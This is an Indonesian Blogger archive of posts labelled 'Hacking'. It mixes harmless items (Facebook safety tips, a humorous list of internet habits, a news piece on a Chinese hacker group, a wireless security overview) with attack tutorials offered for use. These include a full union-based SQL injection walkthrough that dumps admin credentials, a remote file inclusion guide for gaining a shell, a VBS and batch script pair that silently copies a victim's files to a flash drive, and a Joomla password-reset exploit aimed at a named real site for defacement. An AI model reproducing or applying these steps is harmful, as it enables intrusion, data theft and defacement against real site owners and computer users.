Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Tips Menghidari Hacker Facebook

Perlu diketahui, ulah hacker Indonesia untuk meng-hack facebook itu macam-macam caranya. tidak hanya memberikan tips-tips saja. Tapi juga akan memberitahukan cara-cara hacker untuk meng-hack facebook orang. Penasaran ? Mau ?
Kebanyakan dari hacker indonesia itu meng-hack facebook dengan cara seperti ini :
- Dengan membekukan alamat email kita. Cara ini membutuhkan suatu software yang bernama facebook freezer.
- Dengan membuat halaman login palsu / fake login. Caranya dengan menyebarkan link-link yang menuju halaman login facebook. Anda bisa membuatnya. kalau sudah terlanjur di klik, saya saranin jangan sampai anda tertipu untuk login kembali. Karena itu cuma tipuan. Cara ini merupakan cara jadul. Namun ampuh juga sich. Hati-hati iya...
- Dengan menggunakan software keyboard (keylogger). cara ini ampuh juga sich, namun jarang digunakan ...
- Dengan menggunakan software pencuri password. Wah, ini yang paling berbahaya. Dimana software ini bisa tahu password akun facebook kita dari email yang kita punyai. Canggih juga iya. hahaha... DLL .
Tips-tips agar kita terhindar dari ulah para hacker !!
  1. Jangan pernah mengumbar alamat email secara berlebihan. Khususnya dengan orang-orang yang belum kita kenal.
  2. Sembunyikan alamat email yang berada di kotak informasi facebook anda.
  3. Jangan mudah percaya dengan orang-orang yang baru anda kenal.
  4. Kalau anda online di warnet, jangan lupa bersihkan cookies anda !
  5. Berhati-hatilah ketika kita dikasih suatu link yang tujuannya belum kita ketahui dan jangan langsung klik link tersebut.
  6. Selalu bersikap baik dengan teman-teman facebook yang kita punyai. Karena kebanyakan yang nge-hack facebook itu teman facebook kita sendiri.
  7. Pasrah dan jangan takut ! Karena facebook bukanlah segala-galanya. Kalau pun di hack, buat aja yang baru. mudah kan ! ^_^
Good Luck....!!!

Tips-tips agar kita terhindar dari ulah para hacker !!

1. Jangan pernah mengumbar alamat email secara berlebihan. Khususnya dengan orang-orang yang belum kita kenal. 2. Sembunyikan alamat email yang berada di kotak informasi facebook anda. 3. Jangan mudah percaya dengan orang-orang yang baru anda kenal dengan cara tidak nge'add dan meng'approve orang-orang tersebut. 4. Kalau anda online di warnet, jangan lupa bersihkan cookies anda ! 5. Berhati-hatilah ketika kita dikasih suatu link yang tujuannya belum kita ketahui dan jangan langsung klik link tersebut. 6. Selalu bersikap baik dengan teman-teman facebook yang kita punyai. Karena kebanyakan yang nge-hack facebook itu teman facebook kita sendiri. 7. Pasrah dan jangan takut ! Karena facebook bukanlah segala-galanya. Kalau pun di hack, buat aja yang baru. mudah kan ! ^_^ Semoga Mencoba...

“Penyakit” Dunia Cyber

Beberapa hari yang lalu salah satu teman jejaring pertemanan update status menyebutkan istilah asing yang saya benar-benar tidak mengerti artinya bahkan saya tidak tahu masuk dalam bahasa negara manakah itu. Saya langsung bertanya pada beliau yang notabene adalah seorang penulis, dan untunglah dengan sabar beliau menjelaskan arti istilah tersebut bahkan dilengkapi dengan beberapa istilah yang relevan. Jika diambil garis besar, inti dari penjelasan beliau adalah bahwa setelah internet semakin meluas dan memasuki hampir seluruh level kehidupan masyarakat kemudian mulailah bermunculan berbagai macam penyakit dalam ber-internet. Ada banyak sekali istilah yang diciptakan untuk menggambarkan berbagai macam penyakit tersebut, sebagian yang mungkin bisa dibilang paling populer dan paling endemi (cepat menyebar dan tidak bisa hilang) adalah sebagai berikut : 1. EGOSURFING : Sangat amat terobsesi pada reputasi dirinya di dunia maya. Menghabiskan waktu online hanya untuk mencari namanya di search engine besar seperti Google dan Yahoo. Bahkan mengecek rating blog pribadinya di Technorati. 2. BLOGSIBISIONIS : Penderita sangat senang dan bangga meng-ekspose dirinya di dalam blog ataupun situs pertemanan. Bahkan hal-hal sangat pribadi yang seharusnya orang lain tidak perlu tahu, dengan mudahnya disebarluaskan. 3. GILABERRY : Menjangkiti para pimpinan perusahaan. Penderita tidak pernah bisa lepas dari perangkat blackberry-nya, setiap detik memeriksa situs pertemanan dan email. Untuk yang sudah parah, bahkan memeriksa blackberry disaat genting seperti saat terjadi bencana alam atau kebakaran. 4. DETECTIVE GOOGLE : Melakukan pencarian terus menerus dengan search engine Google untuk menyelidiki teman lama, mantan pacar, cinta pertama, atau sekedar gebetan baru. 5. CYBERKONDRIA : Setelah melakukan riset di internet tentang penyakit tertentu atau menerima email tentang penyakit tertentu, penderita akan merasa menderita penyakit tersebut. 6. PHOTOLURKING : Gemar melihat-lihat album foto online milik seseorang yang tidak dikenalnya 7. WIKIPEDIHOLIC : Penderita sangat terdedikasi untuk mengedit dan melengkapi situs ensiklopedi seperti Wikipedia. 8. CHEESEPODDING : Penderita gemar men-download lagu-lagu yang norak, basi dan ketinggalan jaman.

Hacker Cantik dari Negeri China

VIVAnews - Google baru-baru ini menyatakan siap mengundurkan diri dari China dan menutup seluruh operasional mereka di sana. Alasannya, raksasa mesin pencari itu sudah tidak tahan dengan gelombang serangan yang dilancarkan para hacker asal negeri tirai bambu tersebut. David Drummond, Senior Vice President, Corporate Development and Chief Legal Officer Google menyebutkan, pihaknya mendapati adanya ‘serangan yang sangat canggih’ yang berasal dari China terhadap infrastuktur Google. “Serangan-serangan ini membuat kami memutuskan untuk meninjau kelayakan operasi bisnis kami di China,” sebut Drummond blog resmi Google, 12 Januari 2010. Langkah Google yang memilih mundur dari China menunjukkan dahsyatnya komunitas hacker di negeri tersebut. Sampai Juli 2008, diperkirakan terdapat 4 juta orang hacker yang tergabung dalam berbagai komunitas hacker. Salah satunya adalah kelompok hacker khusus wanita yang menamakan diri Cn Girl Security Team. Kelompok hacker ini dipimpin oleh gadis kelahiran Hunan, 6 September 1989 bernama Xiao Tian. Dalam benak, kita mungkin membayangkan bahwa tipikal seorang hacker adalah remaja yang beranjak dewasa, dengan penampilan seadanya – kalau tidak dibilang buruk rupa – dengan kacamata tebal, perokok berat, rambut acak-acakan tak terawat dan jarang mandi karena menghabiskan sebagian besar hidupnya di depan komputer. Ternyata tidak demikian dengan Xiao Tian. Meski menyebutkan ia sering begadang dan sesekali merokok, tetapi penampilannya sangat apik. Sepintas, melihat penampilannya, Anda mungkin tak akan menyangka bahwa ia merupakan pimpinan dari kelompok hacker yang anggotanya mencapai lebih dari 2.200 orang hacker wanita. Xiao Tian menyebutkan, ia membuat kelompok tersebut karena ia merasa bahwa perlu ada tempat bagi gadis remaja sepertinya, yang merasa tersingkirkan dari dunia hacker yang disesaki oleh hacker pria yang menganggap bahwa hacker wanita tidak memiliki skill yang cukup. Perlahan tapi pasti, Xiao Tian dan kelompok hackernya mulai menerobos dominasi pria di dunia hacking. Mereka mengincar status selebritis yang disandang oleh para hacker di China sekaligus membuka peluang ‘karir’ yang menggiurkan yang tersedia bagi hacker yang memiliki reputasi tinggi. Meski anggota klub hacker Xiao Tian masih relatif kecil dibandingkan dengan populasi hacker di China, akan tetapi ‘organisasi’ hackernya mungkin merupakan salah satu kelompok hacker perempuan terbesar di China. Scott Henderson, seorang pensiunan tentara AS yang merupakan pengamat dan penulis The Dark Visitor: Inside the World of Chinese Hackers pernah menyebutkan pada DNA India. “Aspek unik dari hacker China adalah rasa nasionalisme dan kolektivitas. Ini kontras dengan stereotip hacker barat yang umumnya mandiri dan bekerja secara individual di ruang bawah tanah tempat tinggal mereka,” ucapnya. Akan tetapi, belakangan, kecenderungan yang terjadi adalah ‘tentara cyber’ tersebut terpecah-pecah dan membentuk kriminal kapitalis dan mulai meninggalkan rasa nasionalisme mereka. Meski demikian, Henderson menyebutkan, suatu saat jika ada konflik yang melibatkan China, hacker tentu akan memobilisasi kelompok mereka dan terlibat dalam perang dunia maya. Dan jika saatnya tiba, ‘jenderal’ Xiao Tian mungkin akan menjadi salah satu pemimpin pasukan tentara China tersebut.

VIDEO Deface + SQL Injection

oke lngsung ajha y nie aq pux video buat ngedeface + Sql Injection nie linkx : Download :

Pengertian dari SQL Injection

Pengertian sql injection: SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data. Yang perlu di ketahui sebelum sql injection pada mysql: karakter: ' atau - comments: /* atau -- information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x =========== =step Satu:= =========== carilah target misal: [site]/berita.php?id=100 Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error. contoh: [site]/berita.php?id=100' atau [site]/berita.php?id=-100 sehingga muncul pesan error seperti berikut (masih bnyak lagi): ========== =step Dua:= ========== mencari dan menghitung jumlah table yang ada dalam databasenya... gunakan perintah : order by contoh: [site]/berita.php?id=-100+order+by+1-- atau [site]/berita.php?id=-100+order+by+1/* ceklah secara step by step (satupersatu)... misal: [site]/berita.php?id=-100+order+by+1-- [site]/berita.php?id=-100+order+by+2-- [site]/berita.php?id=-100+order+by+3-- [site]/berita.php?id=-100+order+by+4-- sehingga muncul error atau hilang pesan error... misal: [site]/berita.php?id=-100+order+by+9-- berarti yang kita ambil adalah sampai angka 8 menjadi [site]/berita.php?id=-100+order+by+8-- =========== =step Tiga:= =========== untuk mengeluarkan angka berapa yang muncul gunakan perintah union karena tadi error sampai angka 9 maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8-- ok seumpama yg keluar angka 5 gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8-- lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema.. untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema.. ============ =step Empat:= ============ untuk menampilkan table yg ada pada web tsb adalah perintah table_name >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables-- seumpama table yang muncul adalah "admin" =========== =step Lima:= =========== untuk menampilkan semua isi dari table tsb adalah perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()-- ============= = step Enam: = ============= perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa-- pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya website yg digunakan untuk konversi : http://www.v3n0m.net/ascii.htm contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E-- ============ =step Tujuh:= ============ memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)-- contoh kata yang keluar adalah id,username,password [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin-- ============== = step Delapan:= ============== tahap terakhir mencari halam admin atau login . Silahkan DI pelajari

Google Hacks - 100 Industrial Strength Tips Tools

langsung ajha y lg g moet mngetik nie hehehe

Mengenal Shell inject dengan teknik Remote File Include Vulnerability

Mengenal shell exploite inject Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject. Bagai mana cara mendapatkan shell tersebut?.. Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject Bagai mana cara melihat bugs pada suatu script aplikasi pada website?.. Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script ($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php'); ?> require <--- panggilan data $docroot <--- variabel /FCDIRECTORY/fc_functions/fc_functions.php <--- directory dan file dimana ditemukan bugs (kerusakan atau kelemahan) jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut. sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?” $docroot.'/FCDIRECTORY/fc_functions/fc_functions.php jika diputar balikan akan menjadi /FCDIRECTORY/fc_functions/fc_functions.php?docroot= Kaitan Bugs dan Link pada Website Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut?..letaknya ada pada script bugs

Senjata buat para chatter cewek..!!!

Ini hanya trik sederhana menggunakan javascript. Ya lumayan lah bikin kaget victim sedikit, cocok bgt buat para wanita yang sering di PM sama cowok2 nakal dgn kata2 jorok. Pertama2 buka notepad lalu copas tulisan dibawah ini: <center>MASUKKAN NOMOR HP KAMU YA<br><input type="text"></input> <html> <head> <script type="text/javascript"> function display_alert() { alert("SORY KOMPUTER LOE GUE KASIH VIRUS...ITULAH AKIBAT LOE ISENG..KALO MATI KOMPI LOE,BELI BARU LAGI YA!!!!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") alert("TOJAN INVECTED YOUR HARD DISK!!!!!") } </script> </head> <body><input type="button" onclick="display_alert()" value="Submit" /></body> </html></center> Setelah itu Save As dengan nama html. contoh : request nomor HP.html Jika victim buka file tadi maka keluarlah contoh kotak seperti ini : Kata2 bisa dirubah sesuai keinginan loe...cara ini lumayan bikin kaget victim dgn javascript alert yang muncul terus menerus..!!

Cara Menghack Komputer

cara pembutannya sbb: Trik Copy Data Ke Flash Disk Secara Diam-diam 1.Buka notepad, buat file vbs ketik atau copy paste script berikut: dim wshshell, dos set wshshell = wscript.createobject(”wscript.shell”) dos = wshshell.expandenvironmentstrings(”%coms… wshshell.run (dos & ” /c tarik.bat”), vbhide 2.Simpan dengan file name nya contoh start.vbs save as type nya pilih all files 3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut: @echo off mkdir %computername% xcopy “C:\Documents and Settings\%username%\My Documents\*.jpg” %computername% /s/c/q/r @cls @exit 4.Simpan dengan file name nya contoh tarik.bat save as typenya pilih all files. Nama file bat ini harus sesuai dengan script file vbs baris ke empat (tarik.bat) Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer target secara diam-diam jalankan (2x klik) file start.vbs. Fungsi file vbs (start.vbs) berfungsi untuk menjalankan file bat (tarik.bat) secara diam-diam atau istilahnya background proses. Sedangkan file bat (tarik.bat) berfungsi untuk menjalankan perintah copy semua file dengan ektensi tertentu yang ada dikomputer target. Contoh tersebuat diatas adalah copy semua file yang berektensi jpg (file gambar) yang ada di folder MyDocuments di komputer target (lihat baris ketiga script file bat) Dan disimpan kedalam flash disk ke dalam folder dengan nama sesuai nama komputer target. anda bisa meng edit sendiri kedua file tsb diatas sesuai keperluan format file dan folder target yg akan di copy. cara tersebut jangan dicoba di komputer kamu, resiko tanggung sendiri. selamat mencoba.

Memperkenalan WIRELESS HACKING

—-[ Table of Contents]—- [1]. Preface [2]. Pengenalan Wireless Lan (WLAN) [3]. Ancaman-Ancaman yang Mungkin Terjadi [4]. Amankan Jaringan Wireles Anda!! [5]. Istilah-istilah ——————————————- [1]. Preface ———————————- Hi… kamu akan mempelajari Wireless hacking. ALL?? ngak juga sih…, ilmu ini saya pelajari dari teman saya. So, bagi yang udah expert dalam bidang ini, koreksi yach.. wink [2]. Pengenalan Wireless LAN (WLAN) ———————————– Wireless LAN sering juga disebut sebagai Jaringan Nirkabel atau jaringan Wireless. Wireless Local Area Network (WLAN) merupakan jaringan komputer yang menggunakan gelombang radio sebagai media transmisi data. Dalam hal ini berarti informasi/data ditransfer dari satu komputer ke komputer lain dengan menggunakan gelombang radio. Semuanya berawal dari bermunculannya peralatan yang berbasis gelombang radio (walkie talkie, telepon cordless, ponsel, dsb..). Dari sinilah muncul pemikiran untuk menjadikan komputer sebagai sesuatu yang mudah dibawa sehingga bisa dipergunakan dimana saja saat dibutuhkan. Hal-hal seperti inilah yang akhirnya mendorong pengembangan teknilogi wireless untuk jaringan komputer. :: SEJARAH WLAN ————— |-[ Tahun 1997: Sebuah lembaga independen bernama IEEE membuat spesifikasi/standar WLAN pertama yang diberi kode 802.11. Peralatan yang sesuai standar 802.11 dapat bekerja pada frekuensi 2,4GHz, dan kecepatan transfer data (throughput) teoritis maksimal 2Mbps. Namun sayangnya, peralatan yang mengikuti spesifikasi 802.11 kurang bisa diterima di pasar. Througput sebesar ini dianggap kurang memadai untuk aplikasi multimedia dan aplikasi kelas berat lainnya. |-[ Juli 1999: IEEE kembali mengeluarkan spesifikasi baru yang bernama 802.11b. Kecepatan transfer data teoritis maksimal yang dapat dicapai adalah 11 Mbps. Kecepatan tranfer data sebesar ini sebanding dengan Ethernet tradisional (IEEE 802.3 10Mbps atau 10Base-T). Peralatan yang menggunakan standar 802.11b juga bekerja pada frekuensi 2,4Ghz. Namun masih ada kekurangan pada peralatan wireless yang bekerja pada frekuensi ini yaitu kemungkinan terjadinya interferensi dengan peralatan-peralatan lain yang menggunakan gelombang radio pada frekuensi yang sama. Disaat yang hampir bersamaan, IEEE kemudian membuat spesifikasi 802.11a yang menggunakan teknik berbeda. Frekuensi yang digunakan 5Ghz, mendukung kecepatan transfer data teoritis maksimal sampai 54Mbps. Akan tetapi Gelombang radio yang dipancarkan oleh peralatan 802.11a relatif sukar menembus penghalang seperti dinding dan lain sebagainya. Jarak jangkau gelombang radio pun relatif lebih pendek dibandingkan 802.11b. Secara teknis, 802.11b tidak kompatibel dengan 802.11a. Namun saat ini sudah cukup banyak pabrik hardware yang membuat peralatan yang mendukung kedua standar tersebut. |-[ Tahun 2002: IEEE membuat spesifikasi baru yang dapat menggabungkan kelebihan 802.11b dan 802.11a. Spesifikasi baru ini diberi kode 802.11g, bekerja pada frekuensi 2,4Ghz dengan kecepatan transfer data teoritis maksimal 54Mbps. Peralatan 802.11g kompatibel dengan 802.11b sehingga bisa saling dipertukarkan. [3]. Ancaman-Ancaman yang Mungkin Terjadi —————————————– Setiap ada teknologi baru yang ditemukan, selalu ada ancaman yang timbul. Hal ini memang tidak dapat dielakkan. Begitu juga dalam WLAN. Berikut ini adalah ancaman-ancaman yang mungking timbul: :: Pencurian Identitas ———————– Penggunaan MAC ADDRESS (Media Access Control) untuk menentukan komputer mana yang berhak mendapatkan koneksi dari jaringan nirkabel sudah sejak lama dilakukan. Akan tetapi, tidak dapat dipungkiri, hal ini sebenarnya sebenarnya tidak memberikan perlindungan yang berarti dalam sebuah jaringan komputer manapun. Penyusup bisa saja melakukan pencurian identitas dengan teknik spoofing Mac Address untuk menggandakan SSID (Service Set Identifier) dan MAC Address yang merupakan PIN akses jaringan. Penyusup mampu menggunakan SSID dan MAC dari komputer lain untuk melakukan tindakan-tinadkan yang merugikan (misalnya saja pencurian bandwidth). Walaupun toh suatu jaringan telah dilengkapi dengan enkripsi data atau VPN (Virtual Private Network), MAC Address masih bisa dilacak dan di-spoof. Informasi mengenai MAC Address bisa diperoleh dari program seperti Kismet. Untuk melakukan pencurian identitas, penyusup akan menggunakan program spoofing atau mengubahnya melalui Registry (Windows) :: Man-in-the-Middle ——————– “Man-in-the-middle”. Sebenarnya inilah sebuatn bagi sang penyusup. Serangan Man-in-the-Middle dilakukan dengan mengelabui koneksi VPN antara komputer pengguna resmi dan access point dengan cara memasukkan komputer lain di antara keduanya sebagai pancingan. Jenis serangan ini hampir sama dengan jenis serangan pada jaringan kabel. Program yang digunakan juga sama, kecuali perangkat wirelessnya. Dengan menggunakan sebuah program, penyusup mampu memosisikan diri di antara lalu lintas komunikasi data dalam jaringan nirkabel. Serangan seperti ini mudah dilakukan dengan bantuan software yang tepat, misalnya saja Wireless LANJack atau AirJack. Akan tetapi serangan jenis ini juga relatif mudah dicegah dengan IDS yang handal yang mampu memonitoring 24 jam sehari. :: Denial of Service (DoS) ————————– Hohoho.. inilah serangan yang paling ditakutkan oleh para Admin. Denial Of service memang relatif sulit untuk dicegah. Serangan ini dapat menimbulkan downtime pada jaringan. Tool gratisan seperti Wireless LANJack dan hunter_killer mampu melakukan serangan ini. Serangan ini bisa saja diarahkan pada user biasa agar user tersebut tidak bisa terkoneksi dengan suatu access point. Tujuannya tak lain adalah supaya tidak ada pengguna yang bisa menggunakan layanan jaringan Karena adanya kekacauan lalulintas data (penolakan layanan). Seorang penyusup bisa saja mengelabui Extensible Authentication Protocol (EAP) untuk melakukan serangan DoS terhadap suatu server. Aksi ini dibarengi dengan melakukan flooding data. Dengan demikian maka tidak ada satu pun user yang bisa melakukan koneksi dengan layanan jaringan. :: Network Injection ——————— Aapbila sebuah access point terhubung dengan jaringan yang tidak terfilter secara baik, maka penyusup berpotensi untuk melakukan aksi boardcast – seperti spanning tree (802.1D), OSPF, RIP, dan HSRP. Dalam kondisi ini, maka semua perangkat jaringan akan sibuk dan tidak mampu lagi bekerja sebagaimana mestinya. Routing attack juga termasuk dalam serangan jenis ini. Sang penyusup bisa melakukan hal ini dengan mudah menggunakan program seperti IRPAS, yang dipergunakan untuk melakukan injeksi data pada update routing di jaringan, mengubah gateway, atau menghapus table routing yang ada. [4]. Amankan Jaringan Wireles Anda!! ———————————— Solusi berikut memang tidak akan membuat jaringan anda 100% secure. Ingat kata-kata klasik… di dunia yang tidak sempurna ini, tidak ada sesuatu yang 100% secure! Hal-hal berikut ini hanya akan meminimalisir serangan yang berpotensi untuk merusak jaringan anda. 1. Ubahlah Password Default Access Point. Banyak serangan yang terjadi adalah karena segalanya dibiarkan pada setting default, termasuk password. Kebanyakan penyerang biasanya akan berfikiran hal yang satu ini, yaitu berharap bahwa sang target belum mengubah password defaul Access Point. 2. Ubahlah IP default. Dahulu hal ini kurang memungkinkan untuk dilakukan. Namun dewaas ini sudah banyak merek-merek Access Point yang memiliki fasilitas ini. 3. Aktifkan metode enkripsi. Pergunakan enkripsi WPA dengan Pre Shared Key (WPA-PSK).Berikan juga password yang “aman”, dalam artian sulit ditebak dan tidak memiliki arti. Anda juga bisa memanfaatkan enkripsi WPA dengan Temporal Key Integrity Protokol. 4. Matikan fungsi Broadcast SSID. Dengan demikian, maka SSID Anda tidak akan terdeksi pada proses War Driving. Akan tetapi.. kabar buruknya (atau kabar baik??), saat ini sudah ada beberapa aplikasi scanning yang bisa menditeksi SSID yang terhidden. Yeah, walaupun demikian anda tetap bisa melindungi SSID dengan cara merubah nama SSID default dengan nama SSID yang sulit ditebak. 5. Gunakan MAC Address Filtering. Hal ini berguna untuk mengurangi aktivitas penysupan. 6. Non Aktifkan DHCP. Gunakan IP Static dengan nilai yang jarang digunakan. 7. Gunakan Security tambahan seperti CaptivePortal atau aplikasi lainnya yang di inject pada firmware Access Point. 8. Pergunakan software seperti Mc Afee Wireless Home Security untuk melakukan Access Point Monitoring via Client. [5]. Istilah-istilah ——————– 1. Wi-Fi atau WiFi (Wireless Fidelity) Wi-Fi atau adalah nama lain yang diberikan untuk produk yang mengikuti spesifikasi 802.11. Sebagian besar pengguna komputer lebih mengenal istilah Wi-Fi card/adapter dibandingkan dengan 802.11 card/adapter. Wi-Fi merupakan merek dagang, dan lebih popular dibandingkan kata “IEEE 802.11”. 2. Channel Pita frekuensi andaikan sebuah jalan. Channel inilah yang berfungsi seakan-akan sebagi jalur-jalur pemisah pada jalan tersebut. Peralatan 802.11a bekerja pada frekuensi 5,15 - 5,875 GHz, sedangkan peralatan 802.11b dan 802.11g bekerja pada frekuensi 2,4 - 2,497 GHz. Jadi , 802.11a menggunakan pita frekuensi lebih besar dibandingkan 802.11b atau 802.11g. Semakin lebar pita frekuensi, semakin banyak channel yang tersedia. 3. MIMO MIMO (Multiple Input Multiple Output) merupakan teknologi Wi-Fi terbaru. MIMO dibuat berdasarkan spesifikasi Pre-802.11n. Kata ”Pre-” menyatakan “Prestandard versions of 802.11n”. MIMO menawarkan peningkatan throughput, keunggulan reabilitas, dan peningkatan jumlah klien yg terkoneksi. Beberapa keunggulan lain dari MIMO adalah: - Daya tembus MIMO terhadap penghalang lebih baik. - Jangkauannya lebih luas. Access Point MIMO dapat menjangkau berbagai perlatan Wi-Fi yg ada disetiap sudut ruangan. - Access Point MIMO dapat mengenali gelombang radio yang dipancarkan oleh adapter Wi-Fi 802.11a/b/g. - MIMO mendukung kompatibilitas mundur dengan 802.11 a/b/g. Peralatan Wi-Fi MIMO dapat menghasilkan kecepatan transfer data sebesar 108Mbps. 4. WEP WEP (Wired Equivalent Privacy) merupakan salah satu fitur keamanan/sekuriti yang bersifat build-in pada peralatan Wi-Fi. Gelombang radio yang dipancarkan adapter Wi-Fi dapat diterima oleh semua peralatan Wi-Fi yang berada di sekitarnya. Hal inilah yang menjadi ancaman serius karena dalam kondisi ini informasi informasi bisa dengan mudah ditangkap oleh pihak-pihak yang tidak semestinya. Oleh skarena itulah Wi-Fi dibuat dengan beberapa jenis enkripsi : 40 bit, 64 bit, 128 bit dan 256 bit. Namun semakin tinggi tingkat keamanannya, maka penurunan throughput data juga semakin besar. 5. SSID SSID (Service Set IDentifier) merupakan identifikasi atau nama untuk jaringan wireless. Setiap peralatan Wi-Fi harus menggunakan SSID tertentu. Suatu peralatan Wi-Fi dianggap ebrada dalam satu jaringan apabila mengunakan SSID yang sama. Sama seperti password, SSID bersifat case-sensitive yaitu huruf kapital dan huruf kecil dibedakan. 6. SES Selama ini kesulitan yang sering dialami oleh kebanyakan orang ialah dalam hal setup security jaringan. Padahal hal ini merupakan hal yang sangat penting dalam dunai jaringan. Karena itulah diciptakan SES (SecureEasySetup). Kini, hanya dengan menekan satu tombol, SES secara otomatis memberikan SSID dan kode sekuriti ke router dan adapter serta menerapkan security WPA (Wireless Protected Access). Untuk menggunakan SES, pengguna hanya perlu menekan tombol SES pada router, kemudian pada client. Cukup mudah, adn kedua perangkat tersebut kini sudah memiliki jalur lalu-lintas yang aman.

ngedeface web pake jomla

oke langsung ajah pertama masuk k google ke 2 masukin ini inurl:option=com_user bp (bp) bisa di ganti dengan apa ajha lanjut.. target: http://bpauto.sk/index.php?option=com_user&amp;view=reset di rubah jd http://bpauto.sk/index.php?option=com_user&amp;view=reset&amp;layout=confirm setelah itu akan munjul token isi dengan ' &lt;----------- mengapa harus tanda ----------&gt;' dah coba ajah g usah bxk bacot emank gituh dr sanax dah setelah itu akan muncul password dan very password isi dengan sesuka hati setelah itu login dengan username Admin password nya yang tdi km isi setelah itu admin udah jd milik u... sudah itu terserah u dech mau di apain tuh web selesai dech.....
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Belajar Ngeblog - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger